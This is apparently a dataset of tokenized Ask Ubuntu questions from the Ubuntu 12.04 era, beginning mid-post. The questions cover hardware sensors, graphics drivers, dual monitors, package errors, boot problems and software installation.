probing for `national semiconductor lm78 ' at 0x290 ... no probing for `national semiconductor lm79 ' at 0x290 ... no probing for `winbond w83781d ' at 0x290 ... no probing for `winbond w83782d ' at 0x290 ... no lastly , we can probe the i2c/smbus adapters for connected hardware monitoring devices . this is the most risky part , and while it works reasonably well on most systems , it has been reported to cause trouble on some systems . do you want to probe the i2c/smbus adapters now ? ( yes/no ) : y using driver `i2c-i801 ' for device 0000:00:1f.3 : intel ich9 module i2c-i801 loaded successfully . module i2c-dev loaded successfully . now follows a summary of the probes i have just done . just press enter to continue : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) y successful ! monitoring programs wo n't work until the needed modules are loaded . you may want to run 'service module-init-tools start' to load them . unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok sean @ sean-studio-1737 : ~ $ sudo service module-init-tools start module-init-tools stop/waiting i also tried installing i8k but that did n't work since it did n't seem to be able to communicate with the hardware ( probably for different kind of device ) . also i ran acpi -v and here are the results : battery 0 : full , 100 % battery 0 : design capacity 613 mah , last full capacity 260 mah = 42 % adapter 0 : on-line thermal 0 : ok , 49.0 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 100.0 degrees c thermal 1 : ok , 48.0 degrees c thermal 1 : trip point 0 switches to mode critical at temperature 100.0 degrees c thermal 2 : ok , 51.0 degrees c thermal 2 : trip point 0 switches to mode critical at temperature 100.0 degrees c cooling 0 : lcd 0 of 15 cooling 1 : processor 0 of 10 cooling 2 : processor 0 of 10 i have hit a wall and do n't know what to do now . any advice is appreciated .
126346	how to prevent certain applications from accessing the internet ?	i want to prevent certain applications from accessing the internet . when i was using windows xp i had an application ( i think it was zone alarm ) which always notified me when an application tried to access the internet . i wonder if there is an application in ubuntu which would do the same task . if it is possible , please suggest a gui application . the problem is , my internet provider allows me to connect to a single host at a time , that means no two applications can use internet at the same time . when i checked system monitor it showing me that internet is working fine still my browser cant browse.so i want to kill the other application using the internet to browse .
126347	update manager offers update for ibus-hangul & nabi packages but they ca n't be installed	update manager offers update for ibus-hangul & nabi packages but they ca n't be installed ( i ca n't check their checkboxes ) . why ? what unmet dependencies they have and how i can met them ? thank you .
126348	ubuntu 12.04 sometimes does n't halt completely	i am using an dell latitude d830 with ubuntu 12.04 . now , when i turn off the pc , ubuntu does n't halt completely sometimes . i think that is due to the latest nvidia drivers , because in the past with ubuntu 10.10 i installed the latest drivers released by nvidia and i had the same problem . by now , `` messages '' file / var / log is always empty . my video card is : nvidia corporation g86m [ quadro nvs 135m ] pc will not turn off even with `` halt -p '' .
126350	ca n't boot ubuntu 12.04	i installed 12.04 on my windows vista laptop . i wanted to make run ubuntu and ditch windows . i selected to delete disk and install 12.04 . it wo n't let boot 12.04 with out the install disk . when i turn on my laptop now it goes to a black screen with a blinking cursor . i have to power off then insert ubuntu 12.04 cd as if it wants me to reinstall . i checked the drive and ubuntu is there with some of my other saves as well . can someone help me please ?
126352	raleigh theme not found in gnome tweak	i 'm starting with ubuntu . i 've just upgraded from 11.10 to 12.04 release , i had raleigh as window theme , it has changed since then and i ca n't find raleigh in the list ( in tweak ) . how to have it back ? in the file system directory i find /usr/share/theme/raleigh/gtk-2.0/gtkrc can i use that , and how ?
126354	ssh to open gui on target machine ?	i know -x -y options in ssh for x11 forwarding.but these options open the gui apps on my pc.but i want to open a gui application `` exactly '' on target machine . so please help me with this . i tried this but ended up with the following error . no protocol specified no protocol specified no protocol specified error : can not open display : :0
126357	iso image is not getting burned properly !	i tried burning the ubuntu 12.04 iso image in many cd 's and dvd 's but the iso file does not get expanded . it shows only the iso file in it and some cd 's dont show up anything . i tried burning with infrarecorder and burn windows image option by right clicking . how do i burn the file now ? iam using windows 7 32bit and i also have nero ( if its of any use ) . please help me , iam in a big trouble !
126361	ubuntu 12.04 upgrade broke my gui	it is booting without any problem , it did n't even ask me for username/password but after login , i can only see blank scree with right click my only option . someone suggested that i should delete /etc/x11/xorg.conf file so i did that but without any luck . can someone please help me ?
126369	nvidia does n't show up in additional driver + power regression issue in ubuntu 12.04	thank you for reading . i am still having issue with power regression on my asus k53sv after doing a fresh install of ubuntu 12.04 ( i have this issue with ubuntu 11.10 as well ) . thus a helpful guy told me to check my drivers . now , my graphic driver itself is a problem . i have two problems now : ( if i go to system settings > details > graphics , it shows `` graphic unknown '' . and if i go to system settings > additional drivers , it returned nothing in the list and only with a description `` no proprietary drivers are in use on this system '' . i have my windows 7 as my primary os , i install ubuntu using wubi and dual boot them . my battery last for 4-5 hours on windows 7 but only 2 hours on ubuntu . my screen resolution in ubuntu is 1366x768 ( 16.9 ) even without bothering about nvidia thing . the very first time i installed ubuntu 11.10 using wubi i can see there are nvidia drivers appear as a list under additional drivers , but no longer seeing it after the second installation of my ubuntu 11.10. : ( i would really hope to fix the nvidia issue so that i can see if it helps in settling my power regression issue . your kind inputs/comments would be very much appreciated . thank you . : ) *edit : i have added updates to my situation down there . it 's getting better yet complicated as well : /
126372	`` sha256sum mismatch jdk-7u3-linux-x64.tar.gz `` error when trying to install oracle java	i recently tried installed java 7 on ubuntu 12.04 and i think i screwed something up i followed the instructions given here . first you need to remove openjdk for this run the following command from your terminal sudo apt-get purge openjdk* now you can install java7 by adding the following repository : sudo add-apt-repository ppa : eugenesan/java sudo apt-get update sudo apt-get install oracle-java7-installer now everytime i install a new program i get the following error : download done . sha256sum mismatch jdk-7u3-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up python-central ( 0.6.17ubuntu1 ) ... setting up python-eggtrayicon ( 2.25.3-11 ) ... setting up gmail-notify ( 1.6.1.1-1ubuntu1 ) ... processing triggers for python-central ... errors were encountered while processing : oracle-java7-installer error in function : however.the program seems to install and work just fine so it does n't seem to be a problem preventing me from doing anything so then i reinstalled openjdk by going : sudo apt-get install openjdk* but i still get the same error . going : sudo apt-get install oracle-java7-installer gives me the same error . what is going on ? please let me know if this is clear or not and ill try to explain my issue better
126373	installing eclipse , stuck	noob here , setting up my first linux box . i 'm following this page to install eclipse i get to the part where it says to save the nano file - but it 's asking me for a file name and i do n't know what to give it . ( or if the file should be in a certain directory ) any ideas ?
126377	recovering mysql database from an unbootable hard disk	we have installed a linux authentication gateway ( run on ubuntu server ) for more than a year ago . it has several features built in upon install such as squid , php5 , mysql , etc . the thing is this : we see that the os might have some corrupted crucial data structures . the system is now no longer usable . for instance , upon booting up , it complains a lot of `` segmentation fault '' and several commands have [ fail ] instead of [ ok ] . the list is just huge and let 's just say that we ca n't do anything from there any more . we ca n't even log in . when you log in as root , the os simply bounces you back , asking you for your username again and again , in an infinite loop . so , now , we want to at least recover our mandatory files . we basically use a live cd , boot it up and see things in our hard disk . but the mandatory directory : `` mysql '' located at var/lib/ is inaccessible . on the window gui , the directory is visible but it has a rectangle with an x on it . when trying to access , copy or compress the directory , a message box popped up and complained that we do not have the privilege to do such action . sounds like a privilege problem ? well , we simply turn on the terminal and navigate to the var/lib/ directory , hoping to do some simple chmod . however , what is shocking is the mysql directory is invisible . ls command does not list it out . using some directory check bash command , the program says that there is no mysql directory to be found as well . and all these commands are already under root privilege . so in this problem , we want to retrieve everything in the mysql directory via live cd . how do we accomplish this ?
126382	no sound in world of goo ?	i installed worldofgoosetup.1.41.deb and it did n't work . there was a segmentation fault error ( core dumped ) in terminal . i fixed that with : sudo cp /usr/lib/x86_64-linux-gnu/libvorbis.so . * /opt/worldofgoo/libs32 sudo cp /usr/lib/x86_64-linux-gnu/libvorbis.so . * /opt/worldofgoo/libs64 that error is new for me as i have never had it before with previous releases of ubuntu . the game starts now but no sound effects or music is played . i can hear music with my computer , videos , etc , so it is not a volume control problem . i am using ubuntu 12.04 final release .
126383	how do i fix a `` dpkg status database is locked by another process '' error ?	so i was updating ubuntu 11.10 and got a prompt that there was a new version of the vsftpd config . so i entered z and started a new shell to copy my conf . but without thinking i press ctrl+c and i 'm thrown out of the updater . following this i get an error : dpkg : error : dpkg status database is locked by another process how can i get back or restart the updater ?
126388	where can i get physical cds of ubuntu if i live in a place with limited internet connectivity ?	i am based in durban , south africa and would like to get a copy of the operating system but do not have an internet connection . can someone nearby help me make a cd copy ?
126389	ubuntu 12.04 resolution is correct , but windows are pudgy and bloated compared to 11.04 . ati driver is screwed up	i am not a noob to linux , but i am sure as heck not a pro . 12.04 has nearly all the 'tweaks ' out of the box , that i had to manually do myself with prior ubuntu releases , and i am grateful for this . but : i installed 12.04 on my sony vaio vpcee23fx yesterday , and after fooling with unity , ultimately decided o go back to gnome classic . unity was all-new to me ( i resisted upgrading to 11.10 cuz of it ) and so i did n't really notice any change in resolution . however , as soon as i went back to gnome classic , i saw the change . even though my resolution is correct ( according to 'displays ' ) at 1366 x 786 ( 16x9 ) , everything appears bigger and pudgier . the clarity is just fine . words are sharp as ever , and there is no fuzzy or blurred effect anywhere , but windows are bigger , menus are bigger ; basically it cut my workspace size in half , because everything takes up more space now . back in the day , when i installed 11.04 , i was able to use the third-party ati drivers from the 'additional drivers ' tool for my sony and they worked great . even with dual-monitors thru vga . i knew i would have to use them for 12.04 too , in order to have the graphic acceleration i should get . however , the ati post-release package fails to install ( something about var/log/ blah blah ) and the other ati release installs , but royally screws up my dual-monitor set-up . ( resolution parameters are wrong error messages galore , et cetera ) bottom line : ati drivers are n't working right ( i need those two screens ) ubuntu 's drivers seem to be getting the resolution just fine , yet everything is bloated and bigger than it used to be . so big that it bugs me , because i know how much space i used to have on my desktop for windows and such . also , even when i have the proprietary ati driver installed and activated , my resolution options are the same as generic , and everything is just as bloated as without the ati driver . it is at least , clear and legible , but i know that two days from now , i 'm gon na be cursing at my workspace because i do n't have the room i used to , and get my shorts in a knot because i feel claustrophobic . i have no idea how to fix the ati errors with dual-monitors , and i have no other resolution options with the generic driver that can tighten the windows with the max 1366x786 . i am horrible at generating error codes and tracking outputs . i ca n't diagnose problems to save my life using scripts . i usually copy the error bubble , and google the heck out of it . this time , because 12.04 is new , my lack of skill profits me even less . help ?
126390	is it safe to remove ubuntu-desktop package ?	i prefer using synaptic to software center . so i decide to remove the software-center package , but ubuntu-desktop needs to be removed as well . a warning is shown , saying ubuntu-desktop is needed to ensure proper updates . to which extent doesubuntu-desktop effect on updates ? lets say i removed ubuntu-desktop then my ubuntu would be treated as server mode . so does that means i 'll get updates geared toward server i.e . i 'll get packages that unnecessary for my desktop ? thank you .
126392	problem connecting multiple monitors on 12.04 ; problema al conectar monitores ubuntu 12.04 lts	possible translation : i did some configurations with compiz , nothing to crash ( ? ) unity . after that i turned off the computer , turned it back on and tried to connect my monitor in extended mode and it gave me the following error : the position or size required for the crtc 148 is outside the allowable limits : position = ( 1366 , 0 ) , size = ( 1366 , 768 ) , maximum = ( 1600 , 1600 ) gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : the > position or size required for the crtc 148 is outside the allowable limits : position = > ( 1366 , 0 ) , size = ( 1366 , 768 ) , maximum = ( 1600 , 1600 ) can anyone tell me how to solve this problem ? original : hice algunas configuraciones con el compiz , nada que me tumbara el unity , despues de apagar el equipo y volverlo a encender , intente conectar mi monitor en modo extendido y > me da el siguiente error : la posición o tamaño requeridos para el crtc 148 está fuera de los límites permitidos : > posición= ( 1366 , 0 ) , tamaño= ( 1366 , 768 ) , máximo= ( 1600 , 1600 ) > gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : la posición o tamaño requeridos para el crtc 148 está fuera de los límites permitidos : posición= ( 1366 , 0 ) , tamaño= ( 1366 , 768 ) , máximo= ( 1600 , 1600 ) ¿alguien me puede decir como solucionar el problema ?
126398	how to login into ubuntu after an upgrade to 12.04 ?	yesterday i upgraded from ubuntu 11.10 to 12.04 . the upgrade went smoothly . i did a restart and then strange things started to happen . after each upgrade i set my ubuntu to automatic login ( been upgrading from 10.04 until now without a fresh installation , always 64-bit ) . as expected yesterday the login window appeared . the first thing that caught my eye were the lines below my user name . they say `` no value has been set '' . then i type in my password as usual . and then the big one : `` invalid password , please try again '' ! from that time on i tried a couple of things : tried my different passwords . i always use the same password for ubuntu but still i gave it a shot . my default language in ubuntu is english . that is different from my keyboard layout that has a slovenian layout . it has been a problem before that our slovenian layout keyboard and english os do n't always cooperate as they should . that is the reason my ubuntu password has only numbers and english letters . so i tried the on screen keyboard in ubuntu to click my way through the login again no success . then i tried to change my password . i followed these instructions . first through grub . after typing in `` passwd myusername '' i got a puzzling response . the terminal said : passwd : authentication token manipulation error passwd : password unchanged the file system state was read/write because i used fsck command before going into root . then i tried the second option with the live cd . erased the password from the shadow file but still no success logging in ubuntu . then there is the thing with the guest session account . no matter which option i choose ( ubuntu , ubuntu 2d . ) and login nothing happens . the screen goes blank for 3 seconds , the hard disk makes some noise and the login screen comes back on . now i do n't know what to do next . i have a dual-boot system and win7 boots up without problems . ubuntu 11.04 runs great from live cd . i did a memtest just to be sure and there were no errors . so i am kind of certain it is not a hardware problem . link to the contents of lightdm.log . if you require any further information or if i was unclear please let me know ! what else can i do ?
126399	unable to start webcam in ubuntu + virtual box	vm program : virtual box 4.1.12 host os : windows 7 guest os : ubuntu 11.10 i am unable to use my webcam ( my laptop is lenovo z470 ) in the ubuntu vm . most other devices work perfectly fine . i have installed guest additions and i use ubuntu in seamless mode . i am also able to use shared folders . when it comes to usb devices , i am able to mount usb mounted on my host os onto my guest os . i can also use my epson scanner which connects to my laptop through a usb cable . by default my laptop webcam is undetected by my guest os ubuntu . i go to devices > > usb devices > > unknown device obda:58ea [ 2520 ] . when i click on it a new device is detected and it appears as devices > > usb devices > > loeaai10p2sf00721w05636 lenovo easy camera [ 2520 ] . i click it to enable it ( a tick mark appears to its left ) . so far so good . then when i start skype , in options > > video devices i am able to select webcam lenovo easy camera ( /dev/video0 ) . unfortunately , in spite of the enable skype video option being ticked , i am not able to test the webcam or use it in skype conversations . i can click the test button in skype > > options > > video devices but i see no picture . the led which is associated with the webcamera fails to turn on too .
126400	broadcom 4311 wont work on 12.04	i just finished installing linux ubuntu 12.04 on my presario laptop and the broadcom 4311 ( rev 02 ) wireless chip is not working i 've seen solution 's for 11.10 but since 12.04 was just released ( this is my first time using linux ) there dosent seem to be any solution 's available ( the solution for 11.10 that i saw did'nt work ) i thought i 'd ask here ( i 'm using an ethernet connection right now but ) but i waont be able to use it most of the time .
126401	ca n't see boot option	i have dell-gx260 i installed latest ubuntu after windows 7 , by selecting side by side option , everything finished well but when pc restarted , then automatically it loaded windows 7 without giving me option to choose between windows 7 or ubuntu . whats the problem ?
126406	installing ubuntu 12.04 alongside windows 8	i 've installed windows on half of my hard disk space . only one partition . i would like to install ubuntu into my free disk space . the question : in ubuntu installer , when i choose `` install ubuntu alongside windows '' , what 's the next step : installer will realocate my ntfs partition , ignoring my free space or it will install ubuntu into my free disk space , automatically ? thanks in advance .
126408	is there any software like voipgain , megavoip , poivy ?	is there any software like voipgain , megavoip , poivy ? with this software i used to talk to many countries , especially in bangladesh at low cost when i used windows 7 . but now i 'm using ubuntu and i can not use this software . can you please help me about these voip software . thanks a lot .
126409	central speaker playing the subwoofer sound , and subwoofer playing central speaker sound	i 've a c-media sound card - cm8738 and 5.1 speakers . everything seems to work pretty good , but there is a problem - two speakers are mixed - subwoofer is a central speaker , and central speaker is a subwoofer for ubuntu .
126411	volume and other indicators disappeared in the classic desktop	i updgraded my ubuntu to 12.04 lts and then installed gnome classic since i do not like unity . but then the volume icon at the up-right corner has disappeared . how can i get it back to that place . thanks for any help .
126421	what happened to the vim-perl package ?	ubuntu used to provide a vim-perl package , what ever happened to it ? how do i get : perldo back ?
126430	where can i download ubuntu icons from ?	is there a place where i can download the icons that are used in unity ? i wish to use them for a web page project in school . i will be emulating the ubuntu desktop for the purpose . if you could include default wallpapers that would be great too !
126431	website for finding archived .desktop launchers ?	as many of you can relate , updates to 12.04 took away certain launchers from the dash menu . some of which that i used constantly were `` shut down '' , `` restart '' , `` log off '' , and `` software sources '' . now , i know i can use the hud to shut down , restart , and log off , and i can run software-properties-gtk to access sources . but , is there anywhere i can look to find archived .desktop files for these launchers ?
126432	screen connected to the 'mini-displayport ' does n't work anymore on an apple monitor	i am running ubuntu on a mac pro with a apple monitor . the machine has a geforce gt 120 ( aka geforce 9500gt ) . the dvi output is still working , but the screen connected to the 'mini-displayport ' does n't work anymore . things were working perfect in 11.10 . after upgrading to 12.04 , x fails to start . i did a clean install of ubuntu 12.04 and initially things seemed to be working , but after a few reboots i got exactly the same errors . the weird thing is that the errors seem to happen quite randomly . once in a while , x starts fine and everything is ok . but most of the times , x fails to start . there are two errors that i see in my log files : '' screen ( s ) found , but none have a usable configuration . '' `` failed to tear down evo channel '' some info about my setup : xorg.conf as generated by nvidia-xconfig : http : //pastebin.com/b12b5r2d xorg.0.log right after the fresh install when ok : http : //pastebin.com/ne2y2jbr xorg.0.log little later : x has died after i log out : http : //pastebin.com/ln9itcx4 ( error 1 ) xorg.0.log x fails to start at all on boot : http : //pastebin.com/v2yfal8s ( error 2 ) . some info about the hw : jeroen @ jeroen-ubuntu : ~ $ jockey-text -l xorg : nvidia_current - nvidia accelerated graphics driver ( proprietary , enabled , in use ) xorg : nvidia_current_updates - nvidia accelerated graphics driver ( post-release updates ) ( proprietary , disabled , not in use ) jeroen @ jeroen-ubuntu : ~ $ lspci | grep vga 05:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9500 gt ] ( rev a1 ) jeroen @ jeroen-ubuntu : ~ $ sudo lshw -c video *-display description : vga compatible controller product : g96 [ geforce 9500 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory:8a000000-8affffff memory:80000000-87ffffff memory:88000000-89ffffff ioport:3000 ( size=128 ) memory:8b000000-8b07ffff
126439	problems playing mp4 and mp3 files in 12.04 64bit	i 'm experiencing the same problems on 2 machines with 12.04 ( with beta2 and yesterday final release ) ; mp4 files do n't play in default movie player and mp3 quality and timing seem poor . installing medibuntu packages and restricted extras did n't solve . the only player that seems to work fine for me is vlc . i did n't have these problems in 11.04 and 11.10
126441	brightness controls does n't work on a macbook pro 5.5 ( ubuntu 12.04 lts )	i recently installed ubuntu 12.04 lts on my macbook pro 5.5 ( mid 2009 ) . i have a problem with the brightness control . the thing is , when i try to reduce the brightness of my display which would help my battery and also not burn a hole through my eyes , is doesnt work . i tried to use the system preference but nothing . the brightness control brightness slider does n't even work . the only time the screen with change brightness is when ubuntu wants to go to sleep . i went to the ubuntu wiki or whatever it is and went through the macbook pro compatibility stuff to no avail . i 'm not sure if this has been asked allot or not , but i 'm unable to find a solution . i am also new to ubuntu/linux but want to make the change and learn all i can . p.s.- is there anything out there that will make the touch-pad work really well , i 've already played with the mouse/track-pad settings that comes with ubuntu ? it 's working but there seems to be some sluggishness and a few glitches here and there . thank you in advance = )
126443	how to block contacts on empathy ?	i tried to block msn contacts on empathy through `` edit > blocked contacts '' , but nothing happens . it 's a bug ? there is a way to block contacts ? aditional info : ubuntu 12.04 amd64 empathy 3.4.1
126444	ubuntu 12.04 does not recognise cd	~ $ wodim -- devices wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'matshita ' 'dvd-ram uj8b1as' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - but i do n't find access to cd . kindly let me know how to rip the cd . when i try to mount , it gives error . ~ $ mount /dev/sg1 ca n't find /dev/sg1 in /etc/fstab or /etc/mtab
126446	how can you access a folder you want quickly ?	you ca n't put folders in launcher in easy way , so how you access folders or files in fast and easy way ?
126447	fullscreen gnome classic ubuntu 12.04	i have just moved into 12.04 and exploring gnome classic i have realized that when fullscreen youtube the top panel and the inferior panel remains there . this happens also in vlc , but first everythin seems ok and after one minute or so it happens the same thing than in youtube .
126449	skype not showing up in software center after installation	i installed skype on 12.04 with the software center on my 64-bit machine after an upgrade from 11.10 . i find skype in the dash and skype starts up ok . however if i look for it in the software center it does n't show up . on my other machine with a freshly installed 11.04 32-bit it does show up . in addition the skype icon in the top unity panel is missing on my 12.04 machine where as it is present on the 11.10 machine . any ideas ?
126454	speaker and headset problem	after installing 12.04 , the headphone plug no longer mutes my external speakers . -sound settings - analog output - analog stereo duplex mode - test sound left front sounds thru left external speaker right front sounds thru right headset
126455	is this a dual monitor reset bug ?	my two displays are : intel gma x4500 laptop ( 1280x800 native resolution of the built-in display ) external display ( 1920x1080 ) a few minutes after i login to my dual monitor setup , it gets reset to mirror screens . if i restore the settings via the displays application , everything is fine . on each reset , the following messages are written into /var/log/xorg.0.log : [ 60.852 ] ( ii ) pm event received : capability changed [ 60.852 ] i830pmevent : capability change [ 132.920 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12869 [ 132.920 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 132.920 ] ( ii ) intel ( 0 ) : modeline `` 1280x800 '' x0.0 68.94 1280 1296 1344 1408 800 801 804 816 -hsync -vsync ( 49.0 khz ) [ 134.228 ] ( ii ) intel ( 0 ) : allocated new frame buffer 1280x800 stride 5120 , tiled whereas right on startup or manual resolution reset , /var/log/xorg.0.log reports the expected frame buffer allocation : [ 1562.382 ] ( ii ) intel ( 0 ) : edid vendor `` sec '' , prod id 12869 [ 1562.382 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 1562.382 ] ( ii ) intel ( 0 ) : modeline `` 1280x800 '' x0.0 68.94 1280 1296 1344 1408 800 801 804 816 -hsync -vsync ( 49.0 khz ) [ 1576.740 ] ( ii ) intel ( 0 ) : allocated new frame buffer 3200x1080 stride 12800 , tiled is ubuntu 12.04 not compatible with my video card ? can this be solved within ubuntu ? i like its interface , but manually fiddling with resolution on every login is not bearable .
126461	problem during installation	i use a win7 home premium . i 'm trying to install ubuntu in the wubi style . but it shows an error saying '' could n't recover the required log files '' and when i check the text it shows an error proxy authentication required . i do n't understand where in the .exe file should i give my credentials ! ! ! help please with regards venkat
126465	does the live cd allow saving downloaded apps and settings ?	i run ubuntu from live cd and want to retain settings and downloaded apps from the session . does ubuntu allow a configuration file similar to puppy linux that can be saved to the system 's hard drive ?
126467	how to find a computer name in a lan from the ip address ?	my network includes machines running linux and others running windows . and my machine is running linux .
126468	gtk3 theme not working	the theme i 'm trying to install has three folders : metacity , gtk2 and gtk3 if i activate it using gnome-tweak-tool it wont work everything looks extremely ugly , not the way it 's supposed to be transparent , some colors do n't even change if i remove gtk2 folder , theme wont show up in gnome-tweak-tool at all ( i had this problem ever since 11.04 , also on 11.10 , i hoped it would be fixed in 12.04 but same result here , with 'every theme ' ) link to theme http : //gnome-look.org/content/show.php/black-n-white-gtk ? content=149636 what it looks like : what it should look like :
126474	how to solve apt `` package can not be configured because package is in a different version '' errors ?	i ca n't say what steps brought me into this : â sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libtiff4 ( -- configure ) : libtiff4 : i386 3.9.5-1ubuntu1.1 can not be configured because libtiff4 : k386 is in a different version ( 3.9.5-1ubuntu1 ) errors were encountered while processing : libtiff4 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the following commands all end up in the same error : sudo apt-get install -f sudo dpkg -- configure -a sudo apt-get -- fix-broken install sudo apt-get -- fix-missing install sudo apt-get clean sudo apt-get autoclean sudo apt-get autoremove how to solve these kind of problems ? and what did i do wrong ? update i managed to get apt working again by downgrading to previous version ( 3.9.5-1ubuntu1 ) . however , next upgrade led to the same problem . but there is more info now : ( reading database ... dpkg : warning : files list file for package `libtiff4 : k386 ' missing , assuming package has no files currently installed . ( reading database ... 281166 files and directories currently installed . ) preparing to replace libtiff4 3.9.5-1ubuntu1 ( using ... /libtiff4_3.9.5-1ubuntu1.1_i386.deb ) ... unpacking replacement libtiff4 ... dpkg : error processing libtiff4 ( -- configure ) : libtiff4 : i386 3.9.5-1ubuntu1.1 can not be configured because libtiff4 : k386 is in a different version ( 3.9.5-1ubuntu1 ) no apport report written because maxreports is reached already errors were encountered while processing : libtiff4 so the real problem seems to be the missing libtiff4 : k386 package . and k386 seems like a stupid typo somewhere . i tracked down the file that introduces the typo : **/var/lib/dpkg/status** package : libtiff4 status : install ok half-configured multi-arch : same priority : optional section : libs installed-size : 528 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : k386 source : tiff version : 3.9.5-1ubuntu1 config-version : 3.9.5-1ubuntu1 depends : libc6 ( > = 2.11 ) , libjpeg62 ( > = 6b1 ) , zlib1g ( > = 1:1.1.4 ) pre-depends : multiarch-support description : tag image file format ( tiff ) library libtiff is a library providing support for the tag image file format ( tiff ) , a widely used format for storing image data . this package includes the shared library . homepage : http : //libtiff.maptools.org original-maintainer : jay berkenbilt < qjb @ debian.org > fixing the typo solves the problem .
126476	ubuntu on celeron d 326 2.53 ghz , 2 gb ram and gma 950	should i install ubuntu or is the cpu too weak ? it says the cpu is 64bit capable . so which version should i install ? should i use unity 2d ? will lubuntu be significantly faster on this pc ?
126478	stopping upgrade to 12.04 during `` getting new packages '' phase ?	i 'm currently in the middle of the `` getting new packages '' phase of my 11.10 to 12.04 lts upgrade . it 's going slower than expected and i need to leave soon , taking my laptop with me . if i press cancel the operation , will it remove all upgrade progress , necessitating that i start from the beginning again ? or will it resume from the progress at the time of cancelling ?
126486	problem with upgrade to 12.04	i was running 11.10 and wanted to upgrade to 12.04 . after it downloaded all the files , it was loading something ( this was before the installation started ) and the light went out . now when i turn on my computer and boot up ubuntu , i just get the logo and it stays there forever . not even the recovery mode works . i tried booting up from a cd to access my information so i can back up and delete the one i have , but when i try to access the drive it says i do not have permission . any ideas on how to solve either of those problems ? thanks
126491	how do i change the cursor and its size ?	i have recently created an ubuntu 12.04 partition on my windows 7 laptop . when installing it , i switched to `` high contrast '' mode , which has rather large cursors ( by large i mean about twice as large and thick as they should normally are ) . now i have successfully installed the partition , the large cursors have stuck around even after exiting this high contrast mode , but only when i am hovering over stuff e.g . hovering over text inputs , links , and when resizing windows . all of these cursors are too large . they cursor is only normally sized when the computer should be displaying the normal mouse pointer . does anyone know how i might go about fixing this ?
126495	eclipse menus are broken in ubuntu	i downloaded eclipse indigo from the eclipse website and tried to run it on ubuntu 11.10 , but the menus do not show up in the global menu or in the app . before anyone marks this a duplicate , i have already seen the other questions and the bug reports on both launchpad and the eclipse bugtracker . i have tried the workarounds ( unsetting ubuntu_menuproxy or setting appmenu_display_both ) suggested in each of those threads . none of the suggested workarounds worked and every single thread just suggests the ubuntu_menuproxy workaround followed by lots of `` thanks that worked '' . i 've even tried running eclipse in environments that do n't have a global menu like gnome-shell or the gnome fallback session and it still does n't show the menu anywhere . the only thing that works is running eclipse with sudo ( which is a terrible idea ) . this is very frustrating and i am wondering if anyone has any other solutions because this makes ubuntu pretty much useless for any type of development requiring eclipse .
126496	can i convert a 2d video to 3d ?	is it possible to convert a 2d video to 3d on linux ? there are several ways on windows , one is using an avisynth script . i tried opening the script with avconv.exe and virtualdub with wine and avisynth , but it fails to load avisynth.dll .
126498	12.04 reports itself as quantal after installing the toolchain-test-ppa ?	i upgraded to 12.04 ( 64 bit ) today , so far so good , everything worked great , until i tried doing some more advanced stuff . when i tried adding the toolchain-test ppa , i got a mismatch on distribution . after a try or 4 this changed and linked me to this bug report . so far so good , a weird error but i 'm not the only one and it will get fixed right ? but i found it a very weird error , and i also noticed some other ( custom ) apps behaving weird concerning my distribution version . so i tried to find out what release i 'm running , these are the results i got : > : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu quantal ( development branch ) release : 12.10 codename : quantal > : ~ $ cat /etc/issue ubuntu quantal ( development branch ) \n \l now i 'm wondering : did i do something wrong on installation ? did i accidentally download some weird nightly , set up wrong repositories , ... ? or is this simply a bug in some small part of the system that does the reporting wrong and maybe will confuse an app or two ? now , whatever the reason : is there a simple way i can set this release information to the correct version again ?
126500	upgrading mythbuntu 10.10 to 12.04	hoping for some pointers to the right upgrade path for upgrading my working 10.10 mythbuntu system to 12.04 of the same . the notes for 12.04 say to ensure you 've upgraded to mythtv .25 , via the specially provided ppa 's but not sure at what point is best to do that ? any one doing this ? any pointers/gotcha 's ? any help appreciated ; googling and faq 's have not been much help with a version this 'old'.. : - )
126502	how can i install on an asus eee pc 900	i have an asus eee pc 900 with original ssd broken . i want install ubuntu on the sd card . i use an usb pen drive as installation media . the setup process start , but stop after few seconds without messages . there are some parameter to set for start succesfully ? thank you very much !
126504	20gb ssd + 320gb hdd . save ssd space	i have a acer aspire s3 . it has a 20gb ssd and a 320gb hdd . i want to install ubuntu on my small ssd and all my data on the larger hdd . i was wondering what can i store on my hdd to save as much space on my ssd ? also will i be ok running ubuntu on only 20gb ? thank you
